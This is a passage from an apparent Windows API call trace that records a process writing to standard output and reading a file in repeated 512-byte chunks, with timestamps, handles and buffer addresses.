(_FileHandle=1) returned 0x50 [0151.328] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.328] GetFileType (hFile=0x50) returned 0x1 [0151.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.328] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.328] GetFileType (hFile=0x50) returned 0x1 [0151.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.328] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.328] GetFileType (hFile=0x50) returned 0x1 [0151.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.328] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.328] GetFileType (hFile=0x50) returned 0x1 [0151.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.328] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.329] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.329] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.329] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.329] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.329] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.329] GetFileType (hFile=0x50) returned 0x1 [0151.329] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.329] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.329] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.329] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.329] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.330] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.330] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.330] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.330] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.330] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.330] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.330] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.330] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.330] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.330] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.331] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.332] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.333] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.334] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.337] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.337] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.337] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.337] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.337] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.337] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.337] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.337] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.337] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.337] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.338] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.338] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.338] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.338] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.338] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.338] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.338] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.338] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.338] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.338] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.339] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: 